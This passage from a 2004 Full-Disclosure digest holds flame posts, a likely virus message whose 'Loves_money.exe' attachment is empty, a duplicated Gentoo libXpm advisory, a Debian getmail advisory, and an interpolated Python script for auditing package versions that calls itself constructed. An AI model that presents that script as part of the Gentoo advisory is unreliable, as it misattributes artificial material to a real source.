is third-hand and imprecise.  If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?
Go
solve the world's problems or something.  of course, you can't so
you've
decided to just flame people.

Please re-read my posts and think before you respond.

If, besides misreading my posts, you can find no argument with what
I've
said (which, you won't, because I'm right) then I'm willing to hear
them.  Other than that, you're just wasting everyone's time by
trying to
railroad points that you don't understand.

      -Barry

--__--__--

Message: 13
Date: Sun, 26 Sep 2004 22:20:29 -0700
From: r00t3d <r00t3d () gmail com>
Reply-To: r00t3d <r00t3d () gmail com>
To: randallm () fidmail com, full-disclosure () lists netsys com
Subject: [Full-Disclosure] RE: Full-disclosure: JEPG Hype or Hope?

Dear RandallM,

This exploit (if it can be called that) took a lot of thought to
create it and exploit it.

Yea, lots of thought, and ripped shellcode to boot! Can't beat that
can ya?

Correct me if I'm wrong but it does not fall in to the category
of "exploit" as defined by this list.

Okay, you're wrong.

This was truly a "created Exploit"

Seriously? I didn't know exploits were "created" I always thought they
just appeared.

This is nothing more than a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.

Uh oh, are the blaqhats after us again?? I think we had all better
just pull our whitehats down over our heads and hope they go away. I
hear, if you don't move, the blaqhats won't notice you and will leave,
kind of like with bears. Anyways, last time I checked, it wasn't
blaqhats that disclosed exploits, it was whitehats and scene whores.

  Love,
   #MSNetworks

--__--__--

Message: 14
Date: Mon, 27 Sep 2004 09:03:35 +0200
To: "Full-disclosure" <full-disclosure () lists netsys com>
From: "Elvi" <elvi52001 () yahoo com>
Subject: [Full-disclosure] Re: Msg reply

----------tthzhwewredcturxosqp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html><body>

<br>
</body></html>

----------tthzhwewredcturxosqp
Content-Type: application/octet-stream; name="Loves_money.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Loves_money.exe"


----------tthzhwewredcturxosqp--

--__--__--

Message: 15
Date: Mon, 27 Sep 2004 11:44:23 +0200
From: Thierry Carrez <koon () gentoo org>
Organization: Gentoo Linux
To: gentoo-announce () gentoo org
CC: bugtraq () securityfocus com, full-disclosure () lists netsys com,
   security-alerts () linuxsecurity com
Subject: [Full-disclosure] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigEA6620FABBD9968E5B2250AD
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200409-34
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: X.org, XFree86: Integer and stack overflows in libXpm
      Date: September 27, 2004
      Bugs: #64152
        ID: 200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libXpm, the X Pixmap library that is a part of the X Window System,
contains multiple stack and integer overflows that may allow a
carefully-crafted XPM file to crash applications linked against
libXpm, potentially allowing the execution of arbitrary code.

Background
==========

XFree86 and X.org are both implementations of the X Window System.

Affected packages
=================


    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  x11-base/xorg-x11     < 6.7.0-r2                     *>= 6.7.0-r2
                            == 6.8.0                       >= 6.8.0-r1
  2  x11-base/xfree        < 4.3.0-r7                      >= 4.3.0-r7
    -------------------------------------------------------------------
     # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.

     NOTE: Any packages listed without architecture tags apply to all
           architectures...
    -------------------------------------------------------------------
     NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
           MIPS, PPC and SPARC architectures: XFree86 users on those
           architectures should switch to X.org rather than upgrading
           XFree86.
    -------------------------------------------------------------------
     2 affected packages
    -------------------------------------------------------------------

Description
===========

Chris Evans has discovered multiple integer and stack overflow
vulnerabilities in the X Pixmap library, libXpm, which is a part of the
X Window System. These overflows can be exploited by the execution of a
malicious XPM file, which can crash applications that are dependent on
libXpm.

Impact
======

A carefully-crafted XPM file could crash applications that are linked
against libXpm, potentially allowing the execution of arbitrary code
with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All X.org users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
    # emerge ">=x11-base/xorg-x11-6.7.0-r2"

All XFree86 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xfree-4.3.0-r7"
    # emerge ">=x11-base/xfree-4.3.0-r7"

Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
PPC and SPARC architectures: XFree86 users on those architectures
should switch to X.org rather than upgrading XFree86.

References
==========

  [ 1 ] X.org Security Advisory
        http://freedesktop.org/pipermail/xorg/2004-September/003196.html
  [ 2 ] X11R6.8.1 Release Notes
        http://freedesktop.org/pipermail/xorg/2004-September/003172.html
  [ 3 ] CAN-2004-0687
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
  [ 4 ] CAN-2004-0688
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-34.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

--------------enigEA6620FABBD9968E5B2250AD
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
oxM9KaPNaz3q7G2WAXIvbrg=
=OQU0
-----END PGP SIGNATURE-----

--------------enigEA6620FABBD9968E5B2250AD--

--__--__--

Message: 16
Date: Mon, 27 Sep 2004 11:44:23 +0200
From: Thierry Carrez <koon () gentoo org>
Organization: Gentoo Linux
Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com,
   security-alerts () linuxsecurity com
To: andreas.zuercher () telma ch
Subject: [Full-disclosure] [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigEA6620FABBD9968E5B2250AD
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200409-34
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: X.org, XFree86: Integer and stack overflows in libXpm
      Date: September 27, 2004
      Bugs: #64152
        ID: 200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libXpm, the X Pixmap library that is a part of the X Window System,
contains multiple stack and integer overflows that may allow a
carefully-crafted XPM file to crash applications linked against
libXpm, potentially allowing the execution of arbitrary code.

Background
==========

XFree86 and X.org are both implementations of the X Window System.

Affected packages
=================


-------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
-------------------------------------------------------------------
  1  x11-base/xorg-x11     < 6.7.0-r2                     *>= 6.7.0-r2
                            == 6.8.0                       >= 6.8.0-r1
  2  x11-base/xfree        < 4.3.0-r7                      >= 4.3.0-r7
-------------------------------------------------------------------
     # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.

     NOTE: Any packages listed without architecture tags apply to all
           architectures...
-------------------------------------------------------------------
     NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
           MIPS, PPC and SPARC architectures: XFree86 users on those
           architectures should switch to X.org rather than upgrading
           XFree86.
-------------------------------------------------------------------
     2 affected packages
-------------------------------------------------------------------

Description
===========

Chris Evans has discovered multiple integer and stack overflow
vulnerabilities in the X Pixmap library, libXpm, which is a part of the
X Window System. These overflows can be exploited by the execution of a
malicious XPM file, which can crash applications that are dependent on
libXpm.

Impact
======

A carefully-crafted XPM file could crash applications that are linked
against libXpm, potentially allowing the execution of arbitrary code
with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All X.org users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
    # emerge ">=x11-base/xorg-x11-6.7.0-r2"

All XFree86 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xfree-4.3.0-r7"
    # emerge ">=x11-base/xfree-4.3.0-r7"

Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
PPC and SPARC architectures: XFree86 users on those architectures
should switch to X.org rather than upgrading XFree86.

References
==========

  [ 1 ] X.org Security Advisory
        http://freedesktop.org/pipermail/xorg/2004-September/003196.html
  [ 2 ] X11R6.8.1 Release Notes
        http://freedesktop.org/pipermail/xorg/2004-September/003172.html
  [ 3 ] CAN-2004-0687
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687
  [ 4 ] CAN-2004-0688
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-34.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

--------------enigEA6620FABBD9968E5B2250AD
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
oxM9KaPNaz3q7G2WAXIvbrg=
=OQU0
-----END PGP SIGNATURE-----

--------------enigEA6620FABBD9968E5B2250AD--
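
As an added example (not part of the advisory or of Gentoo's tooling), the Vulnerable column of the GLSA 200409-34 "Affected packages" table can be turned into a check over a list of installed package atoms. The function names and the sample atoms are constructed for illustration, and the comparison assumes dotted numeric versions with an optional -rN revision rather than the full Gentoo version grammar.

```python
import re

# Vulnerable column of the GLSA 200409-34 "Affected packages" table.
# Per the advisory, the x11-base/xfree row applies to ALPHA and x86 only.
VULNERABLE = {
    "x11-base/xorg-x11": [("<", "6.7.0-r2"), ("==", "6.8.0")],
    "x11-base/xfree": [("<", "4.3.0-r7")],
}

_VERSION = re.compile(r"^(\d+(?:\.\d+)*)(?:-r(\d+))?$")


def parse_version(text):
    """Return ((major, minor, ...), revision); a missing -rN counts as r0."""
    m = _VERSION.match(text)
    if m is None:
        raise ValueError(f"unsupported version syntax: {text!r}")
    return tuple(int(p) for p in m.group(1).split(".")), int(m.group(2) or 0)


def is_vulnerable(package, installed):
    """True if `installed` falls in a vulnerable range listed for `package`."""
    ranges = VULNERABLE.get(package)
    if not ranges:
        return False  # package is not covered by this advisory
    have = parse_version(installed)
    for op, bound in ranges:
        want = parse_version(bound)
        if (op == "<" and have < want) or (op == "==" and have == want):
            return True
    return False


def audit(atoms):
    """Return the category/name-version atoms that fall in a vulnerable range."""
    flagged = []
    for atom in atoms:
        for package in VULNERABLE:
            version = atom[len(package) + 1:]
            # A digit right after "name-" means this is the listed package,
            # not another package whose name merely starts the same way.
            if atom.startswith(package + "-") and version[:1].isdigit():
                if is_vulnerable(package, version):
                    flagged.append(atom)
    return flagged


# Constructed sample of installed packages (not taken from the advisory).
SAMPLE = ["x11-base/xorg-x11-6.7.0-r1", "x11-base/xorg-x11-6.8.0-r1",
          "x11-base/xfree-4.3.0-r6", "x11-base/xfree-extras-1.0",
          "media-libs/libpng-1.2.7"]

if __name__ == "__main__":
    for atom in audit(SAMPLE):
        print("upgrade needed:", atom)
```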

--__--__--

Message: 17
Date: Mon, 27 Sep 2004 12:34:05 +0200 (CEST)
Reply-To: full-disclosure () lists netsys com
From: debian-security-announce () lists debian org
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] [SECURITY] [DSA 553-1] New getmail packages fix root compromise

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 553-1                     security () debian org
http://www.debian.org/security/                             Martin Schulze
September 27th, 2004                    http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : getmail
Vulnerability  : symlink vulnerability
Problem-Type   : local
Debian-specific: no
CVE ID         : CAN-2004-0880 CAN-2004-0881
Debian Bug     : 272561

A security problem has been discovered in getmail, a POP3 and APOP
mail gatherer and forwarder.  An attacker with a shell account on the
victim's host could utilise getmail to overwrite arbitrary files when
it is running as root.

For the stable distribution (woody) this problem has been fixed in
version 2.3.7-2.

For the unstable distribution (sid) this problem has been fixed in
version 3.2.5-1.

We recommend that you upgrade your getmail package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.dsc
      Size/MD5 checksum:      583 6263f8d2d75ec3eb21dd302e0b9d6729
    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.diff.gz
      Size/MD5 checksum:     2645 ff40d8f72744bfec8a963ece950e0bcd
    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7.orig.tar.gz
      Size/MD5 checksum:    70944 4eef6be77a4cbe1a86eef75affd31b05

  Architecture independent components:

    http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2_all.deb
      Size/MD5 checksum:    74388 f2b9e79b1ddd8ef8bf719d4e1894f051

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce () lists debian org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBV+ydW5ql+IAeqTIRAjKVAJ4jTCBi6jY/HaghCNdQUVfyy2giOQCbB688
7yr1RQ2U25tXqQDxJZqHyPE=
=3lYo
-----END PGP SIGNATURE-----

--__--__--

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure

End of Full-Disclosure Digest


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
